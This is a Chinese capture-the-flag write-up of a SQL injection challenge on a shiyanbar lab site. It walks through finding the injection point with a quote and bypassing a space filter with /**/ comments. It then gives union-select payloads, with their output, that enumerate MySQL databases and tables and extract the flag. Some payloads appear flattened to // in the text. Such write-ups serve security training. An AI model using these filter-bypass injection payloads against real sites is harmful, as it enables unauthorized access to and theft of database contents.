1.
首先检测是否存在注入点,输入',产生报错如下:
You have an error in your SQL syntax; check the manual that >corresponds to your MySQL server version for the right syntax to use >near ''''' at line 1
后台处理了这个单引号,说明此处存在sql注入漏洞,推测后台代码为
select name from 某个表 where id='user_input'
2.
输入1' and 1=1#,产生了报错,说明后台进行了某些过滤,观察网页的url:http://ctf5.shiyanbar.com/423/web/?id=1%27+and+1%3D1%23,发现空格被替换为了+,推测对空格进行了过滤。
3.
对空格进行过滤的常用绕过方法:用()或者/**/代替空格
对单引号的绕过方法:where '1'='1
4.
爆库
输入1'//union//select//schema_name//from//information_schema.schemata//where/**/'1'='1
ID: >1'//union//select//schema_name//from//information_schem>a.schemata//where//'1'='1
name: baloteli
ID: >1'//union//select//schema_name//from//information_schem>a.schemata//where//'1'='1
name: information_schema
ID: >1'//union//select//schema_name//from//information_schem>a.schemata//where//'1'='1
name: test
ID: >1'//union//select//schema_name//from//information_schem>a.schemata//where//'1'='1
name: web1
说明mysql中有四个库,baloteli和information_schema和test和web1
爆表
输入1'//union//select//table_name//from//information_schema.tables//where/**/'1'='1
ID: 1'//union//select//table_name//from//information_schema.tables//where/**/'1'='1
name: flag
得到表名为flag,推测flag也为字段名
爆字段
输入
1'//union//select//column_name//from//information_schema.columns//where//'1'='1
然而出现报错,推测被过滤,于是直接输入:
1'//union//select//flag//from//flag//where//'1'='1
得到flag
网友评论